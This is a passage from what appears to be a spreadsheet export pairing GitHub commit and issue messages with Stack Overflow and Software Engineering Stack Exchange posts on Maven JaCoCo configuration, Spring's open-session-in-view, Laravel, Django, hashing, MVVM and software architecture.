                    &amp;lt;version&amp;gt;5.0.0.4389&amp;lt;/version&amp;gt;
                &amp;lt;/plugin&amp;gt;
            &amp;lt;/plugins&amp;gt;
        &amp;lt;/pluginManagement&amp;gt;
    &amp;lt;/build&amp;gt;
&amp;lt;/project&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And report-aggregate/pom.xml:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;
&amp;lt;project xmlns=&amp;quot;http://maven.apache.org/POM/4.0.0&amp;quot;
         xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot;
         xsi:schemaLocation=&amp;quot;http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd&amp;quot;&amp;gt;
    &amp;lt;modelVersion&amp;gt;4.0.0&amp;lt;/modelVersion&amp;gt;
    &amp;lt;parent&amp;gt;
        &amp;lt;groupId&amp;gt;com.unisys.ch.nabodat&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;test&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;1.0-SNAPSHOT&amp;lt;/version&amp;gt;
    &amp;lt;/parent&amp;gt;
    &amp;lt;artifactId&amp;gt;report-aggregate&amp;lt;/artifactId&amp;gt;
    &amp;lt;properties&amp;gt;
        &amp;lt;maven.compiler.source&amp;gt;17&amp;lt;/maven.compiler.source&amp;gt;
        &amp;lt;maven.compiler.target&amp;gt;17&amp;lt;/maven.compiler.target&amp;gt;
        &amp;lt;project.build.sourceEncoding&amp;gt;UTF-8&amp;lt;/project.build.sourceEncoding&amp;gt;
    &amp;lt;/properties&amp;gt;
    &amp;lt;dependencies&amp;gt;
        &amp;lt;dependency&amp;gt;
            &amp;lt;groupId&amp;gt;com.unisys.ch.nabodat&amp;lt;/groupId&amp;gt;
            &amp;lt;artifactId&amp;gt;sub1&amp;lt;/artifactId&amp;gt;
            &amp;lt;version&amp;gt;1.0-SNAPSHOT&amp;lt;/version&amp;gt;
        &amp;lt;/dependency&amp;gt;
        &amp;lt;dependency&amp;gt;
            &amp;lt;groupId&amp;gt;com.unisys.ch.nabodat&amp;lt;/groupId&amp;gt;
            &amp;lt;artifactId&amp;gt;sub2&amp;lt;/artifactId&amp;gt;
            &amp;lt;version&amp;gt;1.0-SNAPSHOT&amp;lt;/version&amp;gt;
        &amp;lt;/dependency&amp;gt;
    &amp;lt;/dependencies&amp;gt;
    &amp;lt;build&amp;gt;
        &amp;lt;plugins&amp;gt;
            &amp;lt;plugin&amp;gt;
                &amp;lt;groupId&amp;gt;org.jacoco&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;jacoco-maven-plugin&amp;lt;/artifactId&amp;gt;
                &amp;lt;executions&amp;gt;
                    &amp;lt;execution&amp;gt;
                        &amp;lt;phase&amp;gt;verify&amp;lt;/phase&amp;gt;
                        &amp;lt;goals&amp;gt;
                            &amp;lt;goal&amp;gt;report-aggregate&amp;lt;/goal&amp;gt;
                        &amp;lt;/goals&amp;gt;
                        &amp;lt;configuration&amp;gt;
                            &amp;lt;dataFileIncludes&amp;gt;
                                &amp;lt;dataFileInclude&amp;gt;**/jacoco.exec&amp;lt;/dataFileInclude&amp;gt;
                            &amp;lt;/dataFileIncludes&amp;gt;
                            &amp;lt;outputDirectory&amp;gt;${project.reporting.outputDirectory}/jacoco-aggregate&amp;lt;/outputDirectory&amp;gt;
                        &amp;lt;/configuration&amp;gt;
                    &amp;lt;/execution&amp;gt;
                &amp;lt;/executions&amp;gt;
            &amp;lt;/plugin&amp;gt;
        &amp;lt;/plugins&amp;gt;
    &amp;lt;/build&amp;gt;
&amp;lt;/project&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C9</t>
  </si>
  <si>
    <t>Disable open-session-in-view explicitly
By default, Spring has open-session-in-view enabled.  However, this
feature is considered an anti-pattern and the recommendation is not to
use it, so we have to disable it explicitly.
See https://stackoverflow.com/a/48222934</t>
  </si>
  <si>
    <t>The OSIV Anti-Pattern Instead of letting the business layer decide how it’s best to fetch all the associations that are needed by the View layer, OSIV (Open Session in View) forces the Persistence Context to stay open so that the View layer can trigger the Proxy initialization, as illustrated by the following diagram.
The OpenSessionInViewFilter calls the openSession method of the underlying SessionFactory and obtains a new Session.
The Session is bound to the TransactionSynchronizationManager.
The OpenSessionInViewFilter calls the doFilter of the javax.servlet.FilterChain object reference and the request is further processed
The DispatcherServlet is called, and it routes the HTTP request to the underlying PostController.
The PostController calls the PostService to get a list of Post entities.
The PostService opens a new transaction, and the HibernateTransactionManager reuses the same Session that was opened by the OpenSessionInViewFilter.
The PostDAO fetches the list of Post entities without initializing any lazy association.
The PostService commits the underlying transaction, but the Session is not closed because it was opened externally.
The DispatcherServlet starts rendering the UI, which, in turn, navigates the lazy associations and triggers their initialization.
The OpenSessionInViewFilter can close the Session, and the underlying database connection is released as well.
At first glance, this might not look like a terrible thing to do, but, once you view it from a database perspective, a series of flaws start to become more obvious.
The service layer opens and closes a database transaction, but afterward, there is no explicit transaction going on. For this reason, every additional statement issued from the UI rendering phase is executed in auto-commit mode. Auto-commit puts pressure on the database server because each transaction issues a commit at end, which can trigger a transaction log flush to disk. One optimization would be to mark the Connection as read-only which would allow the database server to avoid writing to the transaction log.
There is no separation of concerns anymore because statements are generated both by the service layer and by the UI rendering process. Writing integration tests that assert the number of statements being generated requires going through all layers (web, service, DAO) while having the application deployed on a web container. Even when using an in-memory database (e.g. HSQLDB) and a lightweight webserver (e.g. Jetty), these integration tests are going to be slower to execute than if layers were separated and the back-end integration tests used the database, while the front-end integration tests were mocking the service layer altogether.
The UI layer is limited to navigating associations which can, in turn, trigger N+1 query problems. Although Hibernate offers @BatchSize for fetching associations in batches, and FetchMode.SUBSELECT to cope with this scenario, the annotations are affecting the default fetch plan, so they get applied to every business use case. For this reason, a data access layer query is much more suitable because it can be tailored to the current use case data fetch requirements.
Last but not least, the database connection is held throughout the UI rendering phase which increases connection lease time and limits the overall transaction throughput due to congestion on the database connection pool. The more the connection is held, the more other concurrent requests are going to wait to get a connection from the pool.
Spring Boot and OSIV
Unfortunately, OSIV (Open Session in View) is enabled by default in Spring Boot, and OSIV is really a bad idea from a performance and scalability perspective.
So, make sure that in the application.properties configuration file, you have the following entry:
spring.jpa.open-in-view=false
This will disable OSIV so that you can handle the LazyInitializationException the right way.
Starting with version 2.0, Spring Boot issues a warning when OSIV is enabled by default, so you can discover this problem long before it affects a production system.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a blogging application in Laravel 8.&lt;/p&gt;
&lt;p&gt;There is the option to add tags to articles. There is a many-to-many relationship between articles and tags. I have an &lt;code&gt;article_tag&lt;/code&gt; pivot table.&lt;/p&gt;
&lt;p&gt;In the &lt;code&gt;Tag&lt;/code&gt; model I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Tag extends Model
{
   use HasFactory;
   protected $fillable = ['name'];
   public function articles()
   {
       return $this-&amp;gt;belongsToMany(Article::class);
   } 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To the &lt;code&gt;Article&lt;/code&gt; model I have added the &lt;code&gt;tags()&lt;/code&gt; method&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function tags()
{
    return $this-&amp;gt;belongsToMany(Tag::class)-&amp;gt;as('tags');
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I the ArticleController controller, I have two methods for editing and updating an article:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function edit($id)
  {
    $article = Article::find($id);
    $attached_tags = $article-&amp;gt;tags()-&amp;gt;get()-&amp;gt;pluck('id')-&amp;gt;toArray();
    return view(
      'dashboard/edit-article',
      [
        'categories' =&amp;gt; $this-&amp;gt;categories(),
        'tags' =&amp;gt; $this-&amp;gt;tags(),
        'attached_tags' =&amp;gt; $attached_tags,
        'article' =&amp;gt; $article
      ]
    );
}
public function update(Request $request, $id)
{
    $validator = Validator::make($request-&amp;gt;all(), $this-&amp;gt;rules, $this-&amp;gt;messages);
    if ($validator-&amp;gt;fails()) {
      return redirect()-&amp;gt;back()-&amp;gt;withErrors($validator-&amp;gt;errors())-&amp;gt;withInput();
    }
    $fields = $validator-&amp;gt;validated();
    $article = Article::find($id);
    // If a new image is uploaded, set it as the article image
    // Otherwise, set the old image...
    if (isset($request-&amp;gt;image)) {
      $imageName = md5(time()) . Auth::user()-&amp;gt;id . '.' . $request-&amp;gt;image-&amp;gt;extension();
      $request-&amp;gt;image-&amp;gt;move(public_path('images/articles'), $imageName);
    } else {
      $imageName = $article-&amp;gt;image;
    }
    $article-&amp;gt;title = $request-&amp;gt;get('title');
    $article-&amp;gt;short_description = $request-&amp;gt;get('short_description');
    $article-&amp;gt;category_id = $request-&amp;gt;get('category_id');
    $article-&amp;gt;tags[] = $request-&amp;gt;get('tags[]');
    $article-&amp;gt;featured = $request-&amp;gt;has('featured');
    $article-&amp;gt;image = $request-&amp;gt;get('image') == 'default.jpg' ? 'default.jpg' : $imageName;
    $article-&amp;gt;content = $request-&amp;gt;get('content');
    // Save changes to the article
    $article-&amp;gt;save();
    //Attach tags to article
    if (isset($request-&amp;gt;tags)) {
      $article-&amp;gt;tags()-&amp;gt;sync($request-&amp;gt;tags);
    } else {
      $article-&amp;gt;tags()-&amp;gt;sync([]);
    }
    return redirect()-&amp;gt;route('dashboard.articles')-&amp;gt;with('success', 'The article titled &amp;quot;' . $article-&amp;gt;title . '&amp;quot; was updated');
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In &lt;code&gt;edit-article.blade.php&lt;/code&gt;, I use a &lt;em&gt;multiselect&lt;/em&gt; element to assign tags to articles:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;row mb-2&amp;quot;&amp;gt;
    &amp;lt;label for=&amp;quot;tags&amp;quot; class=&amp;quot;col-md-12&amp;quot;&amp;gt;{{ __('Tags') }}&amp;lt;/label&amp;gt;
    &amp;lt;select name=&amp;quot;tags[]&amp;quot; id=&amp;quot;tags&amp;quot; class=&amp;quot;form-control&amp;quot; multiple=&amp;quot;multiple&amp;quot;&amp;gt;
        @foreach ($tags as $tag)
            &amp;lt;option value=&amp;quot;{{ $tag-&amp;gt;id }}&amp;quot;
                {{ in_array($tag-&amp;gt;id, $attached_tags) ? 'selected' : '' }}&amp;gt;{{ $tag-&amp;gt;name }}&amp;lt;/option&amp;gt;
        @endforeach
    &amp;lt;/select&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem I am faced with is that when I edit the tags list, the &lt;code&gt;&amp;lt;select&amp;gt;&lt;/code&gt; element above does not keep the selected tags if the form is invalid because of validation errors on &lt;em&gt;other&lt;/em&gt; form fields.&lt;/p&gt;
&lt;p&gt;Where is my mistake?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C90</t>
  </si>
  <si>
    <t>Make Issue phrase+recording admin fields readonly
Requesting the speaker name and so on for every recording to show a nice
`__str__()` for everything in the select box was sending way too many
requests to the database.
There are some more sophisticated ways to address this here:
https://stackoverflow.com/questions/6892906/how-to-force-django-admin-to-use-select-related</t>
  </si>
  <si>
    <t>Although dr jimbob's answer makes sense, for my needs, I was able to simply override the get_queryset() method with a one-liner, even selecting a foreign key's foreign key.  Maybe this could be helpful to someone.
class MyModelAdmin(admin.ModelAdmin):
    model = MyModel
    ...
    def get_queryset(self, request):
        return super(MyModelAdmin, self).get_queryset(request).select_related(
            'foreign_key1', 'foreign_key2__fk2_foreign_key')</t>
  </si>
  <si>
    <t xml:space="preserve">What's the difference between "Layers" and "Tiers"?
</t>
  </si>
  <si>
    <t>C900</t>
  </si>
  <si>
    <t>Adding a HashCode type to help with combining hash codes 
@jkotas having a 64bits state doesn't guarantee that your output is going to have the proper statistical properties, the combining function itself must be designed to use an internal 64bits state. Also, if the combining function is good (statistically speaking), there is no such thing as more than less mixing. If the hashing has the randomization, avalanche and other statistical properties of interest, the mixing is accounted for as it is technically speaking a specially crafted hash function.
See for what makes a good hash function (which some clearly are like xor: http://softwareengineering.stackexchange.com/questions/49550/which-hashing-algorithm-is-best-for-uniqueness-and-speed and https://research.neustar.biz/2012/02/02/choosing-a-good-hash-function-part-3/
@jamesqo BTW, I just realized that the combiner wont work for the case of: "I am actually combining hashes (not runtime hashes) because the seed will change every single time." ... public constructor with seed?</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know what guys are using to make diagram of your application/service architecture ? 
I would like to make diagrams representing the different layer of the whole application and for some parts go deeper (class level)
</t>
  </si>
  <si>
    <t>C901</t>
  </si>
  <si>
    <t>Improve the clean archtitecture.
I am not quite sure if I have already understood the structure well enough
I think the code base way build upon this article but I think there are some improvements to be made:
 the webminer folder should contain all the app logic. here we created a separate flask_server folder. this should be in the webminer folder. the current structure is actually against the clean architecture style
 the naming of the folders and files should be adapted. currently it is way too abstract. this was good for the tutorial in the article, but is not optimal for the project.
the idea of the clean architecture, is basically to keep modularity and uni-directional dependency.
Since this topic is interesting for me, here are further readings:
https://softwareengineering.stackexchange.com/questions/336677/what-is-the-difference-between-mvp-and-clean-architecture
https://8thlight.com/blog/uncle-bob/2012/08/13/the-clean-architecture.html
https://www.codingblocks.net/podcast/clean-architecture-make-your-architecture-scream/
https://github.com/mattia-battiston/clean-architecture-example
https://medium.com/@tiagoflores_23976/how-choose-the-appropriate-ios-architecture-mvc-mvp-mvvm-viper-or-clean-architecture-2d1e9b87d48
https://de.slideshare.net/HimanshuDudhat1/mvp-clean-architecture
https://softwareengineering.stackexchange.com/questions/336677/what-is-the-difference-between-mvp-and-clean-architecture</t>
  </si>
  <si>
    <t>What Bob Martin called "Clean Architecture" is more a "meta architecture", a high level guideline for creating layered architectures. It does not say anything like
"There must be a Model layer, a View layer and a Presentation layer, and they must be implemented using MVP",
it contains only more general rules for the layers like "dependencies must go from the outer circles to the inner circles, not vice versa". And since in MVP, the View (=UI) might know the Presenter, but the Presenter is decoupled from the View by an interface, MVP is just one of many possible solutions which fulfills this rule.
Of course, one can use MVP inside a "Clean Architecture" system, but this is not the only one correct approach. Any UI design where the "inner layers" do not know anything special about the UI, and where the UI follows also the other "Clean Architecture" rules described in Bob Martin's article will be fine.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have a file called script.py which I am running under Visual Studio 2022 Community Edition. I am running script.py by right clicking on the window and choosing `Start  with debugging' or 'Start without debugging'. I would like to detect which mode it is launched in from inside the script. For C++, the preprocessor macro _DEBUG is defined in debug mode, and I can use something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#ifdef _DEBUG
debugging code
#endif
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to know how to do something similar for python.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C902</t>
  </si>
  <si>
    <t>Remove CloudKit logic from app delegate. 
App should follow MVCS structure and have a store class to manage CloudKit. https://softwareengineering.stackexchange.com/questions/184396/mvcs-model-view-controller-store</t>
  </si>
  <si>
    <t xml:space="preserve">I've just refactored out a new domain class from a presenter class but I can't figure out where to instantiate it.
This is part of a larger ongoing refactoring effort with a poorly maintained legacy project.
The Presenter is currently being created by the view's OnLoad event and the view is passed as a parameter in the constructor. All public methods in the presenter are parameterless and return void. They communicate with the view using public properties of the view.
The view, being essentially a humble form depends entirely on the presenter for everything.
This is the typical Passive View pattern and I'd like to continue to adhere to it. Which brings me to my dilemma. I need to create an instance of my new domain object for the presenter to use. 
If I pass it through the constructor then the view has to create it and gains an unnecessary dependency.
If I create it anywhere within the presenter, I can't replace it with a mock object in my unit tests.
If I make it a public property of the presenter then I introduce a creation order dependency on the presenter methods where it is used and I still haven't solved what external class gets responsibility for creating it.
I am not currently using any dependency injection frameworks. While I'm interested it using one in the future the source code is still much to fragile to introduce a third party framework into the mix.
I'm open to any suggestions.
</t>
  </si>
  <si>
    <t>C903</t>
  </si>
  <si>
    <t>TypeLoadException when trying to attach to event of hosting application
Thanks for the hint on not necessarily requiring separate AppDomain for ScriptRunner and Script. No, the ScriptRunner doesn't host multiple scripts, it is unloaded and recreated for each script. To me, it just looked more natural and better separated having two domains instead of a single ScriptRunner+Script domain. Also, the ScriptRunner domain only needs to load the script assembly in two specific cases:
a) Script attaches to event.
b) Script throws a user defined exception.
In all other cases, the ScriptRunner domain stays unspoiled as well.
For the test application, the TypeLoadException can be explained by the fact that the script assembly gets loaded into the host assembly. For the fully application, I will have to dig again. I suspect that the intermediate AppDomain doesn't fully decouple host and script domain, thus the issue actually happens back in the host domain. But that's just a guess.
Just for curiosity, I quickly googled around for Caliburn.Micro, seems that not everybody got convinced by it: https://softwareengineering.stackexchange.com/questions/287322/how-to-choose-not-to-use-a-framework-caliburn-micro-etc-in-a-given-mvvm-appl. Regarding "my users", they typically don't do MVVM. If using a form, it's just a message box or something rather simple. For such cases, WinForms is way good enoug</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Grails 4.0.10 application which is a running registration application.&lt;/p&gt;
&lt;p&gt;I am getting a &lt;strong&gt;Illegal attempt to associate a collection with two open sessions&lt;/strong&gt; error in a Quartz Job in my application.&lt;/p&gt;
&lt;p&gt;This is the method in RegistrationService called by PaymentController. It triggers BibAssigner Job at the end. The BibAssigner Job is responsible for assigning bibs to the registrations.&lt;/p&gt;
&lt;p&gt;RegistrationService&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Transactional
void activateRegistrations(SaleInvoice invoice){
    Assert.notNull(invoice, 'SaleInvoice cannot be null when activating registrations.')
    List&amp;lt;Registration&amp;gt; registrations = this.findRegistrationsBySaleInvoice(invoice)
    def mp = [:]
    registrations.each{
        it.status = EntityStatus.ACTIVE
        if (it.race.capacity) {
            it.race.capacity?.allocated += 1
            it.race.capacity?.save()
        }
        if (it.compositeEvent.capacity) {
            it.compositeEvent.capacity?.allocated += 1
            it.compositeEvent.capacity?.save()
        }
        if (it.registrationEntry?.template?.capacity) {
            it.registrationEntry.template.capacity?.allocated += 1
            it.registrationEntry.template.capacity?.save()
        }
        it.acceptedRunnercardDisclaimer = it.waiver.runnercardDisclaimer.disclaimer.content
        it.acceptedEventDisclaimer = it.waiver.eventDisclaimer.disclaimer.content
        it.save()
        if(!mp[it.race.id]){
            mp[it.race.id] = [it]
        }
        else{
            mp[it.race.id].add(it)
        }
        if(it.errors?.errorCount &amp;gt; 0){
            log.error &amp;quot;error when activating registrations &amp;quot; + it.errors
        }
    }
    if(invoice.compositeEvent.assignBibNumbers){
        BibsAssignerJob.triggerNow([regmap: mp])
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the Quartz Job for bib assignment.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class BibsAssignerJob {
    static concurrent = false
    def mailService
    def bibsService
    static triggers = {
//      simple repeatInterval: 5000l // execute job once in 5 seconds
    }
    //mp is map of race id -&amp;gt; [registration1, registration2]
    void assignBibNumbers(mp){
            Race.withTransaction {
                try {
                    def bibRangeEventBased = true
                    for (r in mp) {
                        def rac = Race.get(r.key)
                        if (rac.bibsRange) {
                            bibRangeEventBased = false
                            break
                        }
                    }
                    if (!bibRangeEventBased) {
                        //first assign bibs to races with range assignment
                        for (r in mp) {
                            def rac = Race.get(r.key)
                            if (rac.bibsRange) {
                                def regs = r.value
                                def bibs = bibsService.convertRangeStringToRangeList(rac.bibsRange)
                                //def lastBib = bibsService.getLastBibAssignmentInEvent(regs[0].compositeEvent)
                                bibs.removeAll(bibsService.getAllBibsAssigned(rac.compositeEvent))
                                for (int i = 0; i &amp;lt; regs.size(); i++) {
                                    if (i &amp;lt; bibs.size()) {
                                        if (regs[i].compositeEvent.assignBibNumbers) {
                                            def registration = grails.util.Holders.applicationContext.getBean('proxyHandler').unwrapIfProxy(regs[i])
                                            registration.raceParticipant.bibNumber = bibs[i]
                                            registration.markDirty('raceParticipant')
                                            registration.save(flush: true)
                                        }
                                    }
                                }
                            }
                        }
                    } else {
                        //assign bibs based on event range
                        def regs = []
                        for (r in mp) {
                            regs += r.value
                        }
                        def bibs = bibsService.convertRangeStringToRangeList(regs[0].compositeEvent.bibsRange)
                        //def lastBib = bibsService.getLastBibAssignmentInEvent(regs[0].compositeEvent)
                        bibs.removeAll(bibsService.getAllBibsAssigned(regs[0].compositeEvent))
                        for (int i = 0; i &amp;lt; regs.size(); i++) {
                            if (i &amp;lt; bibs.size()) {
                                if (regs[i].compositeEvent.assignBibNumbers) {
                                    def registration = grails.util.Holders.applicationContext.getBean('proxyHandler').unwrapIfProxy(regs[i])
                                    registration.raceParticipant.bibNumber = bibs[i]
                                    registration.markDirty('raceParticipant')
                                    registration.save(flush: true)
                                }
                            }
                        }
                    }
                }
                catch (Exception e) {
                    def regs = mp.values().toList().flatten()
                    def ev = regs.first().compositeEvent.name + &amp;quot;(${regs.first().compositeEvent.id})&amp;quot;
                    def pars = &amp;quot;&amp;quot;
                    for(reg in regs){
                        pars += reg.participant.name
                        pars += &amp;quot;, &amp;quot;
                    }
                    println &amp;quot;************************************************************************************************************************************&amp;quot;
                    println &amp;quot;Bibs assignment failed for ${ev} and participants ${pars}. Exception thrown was ${e}&amp;quot;
                    println &amp;quot;************************************************************************************************************************************&amp;quot;
                }
            }
    }
    def execute(context) {
        // execute job
        Thread.sleep(20000)
        println &amp;quot;Running Bib Assigner&amp;quot;
        def mp = context.mergedJobDataMap.regmap
        if (mp.size() == 0){
            return
        }
        assignBibNumbers(mp)
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the error is caught by Exception block in BibAssigner Job&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; catch (Exception e) {
                    def regs = mp.values().toList().flatten()
                    def ev = regs.first().compositeEvent.name + &amp;quot;(${regs.first().compositeEvent.id})&amp;quot;
                    def pars = &amp;quot;&amp;quot;
                    for(reg in regs){
                        pars += reg.participant.name
                        pars += &amp;quot;, &amp;quot;
                    }
                    println &amp;quot;************************************************************************************************************************************&amp;quot;
                    println &amp;quot;Bibs assignment failed for ${ev} and participants ${pars}. Exception thrown was ${e}&amp;quot;
                    println &amp;quot;************************************************************************************************************************************&amp;quot;
                }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The error is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;org.springframework.orm.hibernate5.HibernateSystemException: Illegal attempt to associate a collection with two open sessions. Collection : [com.runnercard.registration.Registration.inventory#382465]; nested exception is org.hibernate.HibernateException: Illegal attempt to associate a collection with two open sessions. Collection : [com.runnercard.registration.Registration.inventory#382465]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I appreciate any insights from the Grails experts who have worked with Quartz Jobs on what could be the cause. My guess is it has something to do with concurrency issue. I have tried to recreate this issue but it seems to be intermittent issue. How can i solve this issue? I appreciate any help. Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I have tried CaliburnMicro and MVVMLight and when using Caliburn I really feel what you feel, sure it feels really magical able to bind a control to a property just by using Name="PropertyName" instead of old Text="{Bind PropertyName}" but in the end Caliburn goes way overboard to do this magical thing.  When something goes wrong it is really hard to debug and to make things worse they have a lot of ways to do one thing.
In contrast, MVVMLight is really thin.  When you use it you probably realize that it is almost 100% like your MVVM Framework, with some feature sprinkled in it.
I know this doesn't answer your question "How NOT to use framework" but frankly I can't recommend you go that route. I think you are just lost because you used a full featured framework instead of using a simple one first.</t>
  </si>
  <si>
    <t>C904</t>
  </si>
  <si>
    <t>When using nanboxes lot's of the user facing API is not linkable, this is a problem when calling janet functions from non C languages which generally don't support macros, only external C functions.
I hit this problem while using rust's bindgen program to write a janet module, where most of the wrap and unwrap functions are not usable.
I think it is possible to have linkable symbols and inlined functions with some change
The latest master should have made most of the API functions linkable, including all of the wrap/unwrap macros. This works as now the previously macro only API definitions have a function version of the same name, which wraps the macro. When linking to non-C languages, you should get the function version, but if you have a C preprocessor, you will get the macro version. This is a standard technique, discussed here https://softwareengineering.stackexchange.com/questions/159846/why-does-the-c-library-use-macros-and-functions-with-same-name</t>
  </si>
  <si>
    <t>The macro is (putatively) more efficient, as it doesn't involve a function call.  It can be optimised more easily, as it just involves a pointer offset lookup.
The function call allows linking against the same library even if the program was compiled without the macro definition - if it was compiled with a different header, or just with a rogue declaration inside the source file. Should, for example, you have a compiler which has someone's "improved" version of ctype.h that
didn't
have the macro, the function would still exist at runtime for use.
If we look at the standard:
c99
7.1.4 Use of library functions
Any function
  declared in a header may be additionally implemented as a function-like macro deﬁned in the header, so if a library function is declared explicitly when its header is included, one
  of the techniques shown below can be used to ensure the declaration is not affected by
  such a macro. Any macro deﬁnition of a function can be suppressed locally by enclosing
  the name of the function in parentheses, because the name is then not followed by the left
  parenthesis that indicates expansion of a macro function name. For the same syntactic
  reason, it is permitted to take the address of a library function even if it is also deﬁned as a macro.
That means that if you write:
int b = (isdigit)(c);
or
int (*f)(int) = &amp;isdigit;
int b = f(c);
then you are invoking the actual function, not the macro.  You can also legally write:
#undef isdigit
int b = isdigit(c);
or (in a source file not having
#include &lt;ctype.h&gt;
directly or transitively):
extern int isdigit(int);
int b = isdigit(c);</t>
  </si>
  <si>
    <t xml:space="preserve">I am about to write some standards/guidelines and templates that project managers, developers and business analysts would use. The goal would be to better understand the solution that is or was developed. 
One part of this is providing a standard/guideline on documenting the solution. E.g. documenting the piece of software which solves/meets the business-case/user-requirements.
Now, being a programmer myself I can see that it is impossible to dictate and say "each solution must define X using Y and presenting it according to Z.", as X Y Z is not always applicable etc.
However, I know even for my hobby projects I always end up describing my solutions one way or the other, modules/components, source code comments, API, database model, some taxonomy used, a journal-log, xml format etc..
So in order to continue with my work, I would much appreciate if you could share what you document in order to describe your solution (and preferably also how and why) - I know it will vary greatly depending on many things but any general or specific answer is of interest. Thanks.
update
It was not clear, but I was not referring to user requirements with X Y Z. I was referring to all the possible types of documentation a system may have. So read it as "impossible to state that each solution must have: list of required frameworks; operational manual for the server software; required master data; matrix of user requirements vs tests; user interface specification. While it makes sense to produce a such limited set of requirements, it is difficult to be clear and precise as what is the most important/relevant is different from project to project.
Also, I asked this quite a while ago and never accepted an answer, sorry for that. Perhaps, since it is an open question, it would be better as a community wiki?
</t>
  </si>
  <si>
    <t>C905</t>
  </si>
  <si>
    <t>Replaced term "component" with "module".
A module is a bigger building block than a component.
See https://softwareengineering.stackexchange.com/questions/178927/</t>
  </si>
  <si>
    <t>The terms are similar. I generally think of a "module" as being larger than a "component". A component is a single part, usually relatively small in scope, possibly general-purpose. Examples include UI controls and "background components" such as timers, threading assistants etc. A "module" is a larger piece of the whole, usually something that performs a complex primary function without outside interference. It could be the class library of an application that provides integration with e-mail or the database. It may be as large as a single application of a suite, such as the "Accounts Receivable module" of an ERP/accounting platform.
I also think of "modules" as being more interchangeable. Components can be replicated, with new ones looking like old ones but being "better" in some way, but typically the design of the system is more strictly dependent upon a component (or a replacement designed to conform to that component's very specific behavior). In non-computer terms, a "component" may be the engine block of a car; you can tinker within the engine, even replace it entirely, but the car must have an engine, and it must conform to very rigid specifications such as dimensions, weight, mounting points, etc in order to replace the "stock" engine which the car was originally designed to have. A "module", on the other hand, implies "plug-in"-type functionality; whatever that module is, it can be communicated with in such a lightweight way that the module can be removed and/or replaced with minimal effect on other parts of the system. The electrical system of a house is highly modular; you can plug anything with a 120V15A plug into any 120V15A receptacle and expect the thing you're plugging in to work. The house wiring couldn't care less what's plugged in where, provided the power demands in any single branch of the system don't exceed safe limits.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type OutlinedButtonProps = {
  fill: 'outlined';
  color?: 'primary' | 'danger' | 'neutral';
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To be transformed into:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const outlinedButtonProps = {
  fill: ['outlined'],
  color: ['primary', 'danger', 'neutral']
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C906</t>
  </si>
  <si>
    <t xml:space="preserve">I've been unleashed on version 2 of an application my company has been working on.  It was our first foray into WPF and needless to say, a lot of lessons were learned.  The product took a year to develop, so it's not a small application by any means.  Everyone recently came on board with MVVM.
Now that we have a large code base with plenty of x:Name's and lots of logic in the code backing files, is it too late to switch to something like MVVM moving forward?  Keep in mind, it's probably not in the budget to go back and change existing windows to adopt this pattern, so there will always be a mixture of both, should be adopt MVVM going forward.
Appreciate opinions on the matter.
</t>
  </si>
  <si>
    <t>C907</t>
  </si>
  <si>
    <t>Generate unique identifier
Will generate a unique identifier from a incrementing number and (if it
exists) the displayName of the component. Since these identifiers are
directly used as classes inside the DOM, we have to make sure they're
reasonably unique and don't start with a number.
I use murmurhash becuase it is the quickest hashing functions that
avoids collisions as good as possible, see https://softwareengineering.stackexchange.com/questions/49550/which-hashing-algorithm-is-best-for-uniqueness-and-speed for an in-depth analysis.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am able to select all rows in postgresql:&lt;br/&gt;
&lt;code&gt;SELECT * FROM public.qTimesProduction ORDER BY id ASC &lt;/code&gt; (works)&lt;br/&gt;
but filter selecting on a column:&lt;br/&gt;
&lt;code&gt;SELECT * FROM public.qtimesproduction WHERE queryname = 'testQuery';&lt;/code&gt; (!work)&lt;br/&gt;
returns nothing.&lt;br/&gt;
I have checked the privileges on the user and also the security policy on the table.&lt;br/&gt;
User has all privileges granted and there is no security policy on the table.&lt;/p&gt;
